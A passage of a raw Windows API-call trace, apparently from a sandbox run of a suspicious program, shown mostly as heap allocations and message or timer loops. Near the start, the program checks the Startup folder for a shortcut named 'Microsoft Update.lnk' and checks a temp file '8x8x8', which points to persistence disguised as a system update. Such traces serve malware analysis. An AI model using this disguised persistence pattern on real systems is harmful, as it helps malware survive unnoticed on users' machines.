(HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0230.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0230.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0230.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0230.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0230.369] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0230.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0230.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0230.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0230.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0230.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0230.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0230.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0230.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0230.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0230.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0230.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0230.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0230.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0230.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0230.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0230.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0230.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0230.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0230.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0230.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0230.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0230.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0230.370] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0230.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0230.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0230.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0230.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0230.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0230.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0230.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0230.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0230.371] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0230.371] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0230.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0230.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0230.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0230.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0230.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0230.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0230.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0230.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0230.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0230.371] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0230.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0230.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0230.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0230.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0230.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0230.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0230.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0230.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0230.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0230.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0230.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0230.372] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0230.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0230.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0230.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab650 [0230.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0230.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0230.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4b8 [0230.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0230.372] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0230.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0230.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eabe0 [0230.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0230.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0230.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0230.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0230.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0230.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0230.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0230.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0230.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0230.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0230.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0230.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0230.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0230.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0230.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0230.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eabe0 | out: hHeap=0x2af0000) returned 1 [0230.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0230.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0230.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0230.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0230.373] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0230.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0230.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0230.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0230.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0230.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0230.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0230.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0230.373] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0230.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0230.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0230.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0230.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0230.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0230.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0230.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0230.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0230.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0230.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0230.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0230.374] timeGetTime () returned 0x1179940 [0230.374] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.374] Sleep (dwMilliseconds=0xa) [0230.412] timeGetTime () returned 0x1179970 [0230.412] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0230.412] TranslateMessage (lpMsg=0x8cf798) returned 0 [0230.412] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0230.412] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0230.412] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0230.412] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.412] Sleep (dwMilliseconds=0xa) [0230.458] timeGetTime () returned 0x117999e [0230.458] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.458] Sleep (dwMilliseconds=0xa) [0230.512] timeGetTime () returned 0x11799d5 [0230.512] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.512] Sleep (dwMilliseconds=0xa) [0230.539] timeGetTime () returned 0x11799ec [0230.539] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.539] Sleep (dwMilliseconds=0xa) [0230.571] timeGetTime () returned 0x1179a0c [0230.571] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.571] Sleep (dwMilliseconds=0xa) [0230.584] timeGetTime () returned 0x1179a1b [0230.584] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.584] Sleep (dwMilliseconds=0xa) [0230.604] timeGetTime () returned 0x1179a2b [0230.604] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.604] Sleep (dwMilliseconds=0xa) [0230.641] timeGetTime () returned 0x1179a4a [0230.641] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.641] Sleep (dwMilliseconds=0xa) [0230.661] timeGetTime () returned 0x1179a69 [0230.661] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.661] Sleep (dwMilliseconds=0xa) [0230.676] timeGetTime () returned 0x1179a79 [0230.676] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.676] Sleep (dwMilliseconds=0xa) [0230.692] timeGetTime () returned 0x1179a89 [0230.692] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.692] Sleep (dwMilliseconds=0xa) [0230.707] timeGetTime () returned 0x1179a98 [0230.707] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.707] Sleep (dwMilliseconds=0xa) [0230.723] timeGetTime () returned 0x1179aa8 [0230.723] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.723] Sleep (dwMilliseconds=0xa) [0230.738] timeGetTime () returned 0x1179ab7 [0230.738] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.738] Sleep (dwMilliseconds=0xa) [0230.757] timeGetTime () returned 0x1179ac7 [0230.757] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.757] Sleep (dwMilliseconds=0xa) [0230.770] timeGetTime () returned 0x1179ad7 [0230.770] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.770] Sleep (dwMilliseconds=0xa) [0230.788] timeGetTime () returned 0x1179ae6 [0230.788] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.788] Sleep (dwMilliseconds=0xa) [0230.801] timeGetTime () returned 0x1179af6 [0230.801] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.801] Sleep (dwMilliseconds=0xa) [0230.817] timeGetTime () returned 0x1179b06 [0230.817] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.817] Sleep (dwMilliseconds=0xa) [0230.832] timeGetTime () returned 0x1179b15 [0230.832] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.832] Sleep (dwMilliseconds=0xa) [0230.848] timeGetTime () returned 0x1179b25 [0230.848] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.848] Sleep (dwMilliseconds=0xa) [0230.864] timeGetTime () returned 0x1179b35 [0230.864] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.864] Sleep (dwMilliseconds=0xa) [0230.895] timeGetTime () returned 0x1179b54 [0230.895] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.895] Sleep (dwMilliseconds=0xa) [0230.911] timeGetTime () returned 0x1179b63 [0230.911] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.911] Sleep (dwMilliseconds=0xa) [0230.926] timeGetTime () returned 0x1179b73 [0230.926] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.926] Sleep (dwMilliseconds=0xa) [0230.947] timeGetTime () returned 0x1179b83 [0230.947] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.947] Sleep (dwMilliseconds=0xa) [0230.973] timeGetTime () returned 0x1179ba2 [0230.973] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.973] Sleep (dwMilliseconds=0xa) [0230.988] timeGetTime () returned 0x1179bb1 [0230.988] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0230.989] Sleep (dwMilliseconds=0xa) [0231.005] timeGetTime () returned 0x1179bc1 [0231.005] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.005] Sleep (dwMilliseconds=0xa) [0231.020] timeGetTime () returned 0x1179bd1 [0231.020] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.020] Sleep (dwMilliseconds=0xa) [0231.035] timeGetTime () returned 0x1179be0 [0231.035] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.035] Sleep (dwMilliseconds=0xa) [0231.051] timeGetTime () returned 0x1179bf0 [0231.051] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.051] Sleep (dwMilliseconds=0xa) [0231.105] timeGetTime () returned 0x1179c1f [0231.105] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.105] Sleep (dwMilliseconds=0xa) [0231.129] timeGetTime () returned 0x1179c3e [0231.129] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.129] Sleep (dwMilliseconds=0xa) [0231.192] timeGetTime () returned 0x1179c7d [0231.192] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0231.192] TranslateMessage (lpMsg=0x8cf798) returned 0 [0231.192] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0231.192] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0231.192] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0231.192] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.192] Sleep (dwMilliseconds=0xa) [0231.208] timeGetTime () returned 0x1179c8c [0231.208] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.208] Sleep (dwMilliseconds=0xa) [0231.224] timeGetTime () returned 0x1179c9c [0231.224] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.225] Sleep (dwMilliseconds=0xa) [0231.239] timeGetTime () returned 0x1179cab [0231.239] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.239] Sleep (dwMilliseconds=0xa) [0231.257] timeGetTime () returned 0x1179cbd [0231.258] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.258] Sleep (dwMilliseconds=0xa) [0231.287] timeGetTime () returned 0x1179cda [0231.287] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.287] Sleep (dwMilliseconds=0xa) [0231.301] timeGetTime () returned 0x1179cea [0231.301] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.301] Sleep (dwMilliseconds=0xa) [0231.317] timeGetTime () returned 0x1179cfa [0231.317] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.317] Sleep (dwMilliseconds=0xa) [0231.333] timeGetTime () returned 0x1179d09 [0231.333] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.333] Sleep (dwMilliseconds=0xa) [0231.348] timeGetTime () returned 0x1179d19 [0231.348] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0231.348] Sleep (dwMilliseconds=0xa) [0231.364] timeGetTime () returned 0x1179d28 [0231.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0231.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0231.364] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, 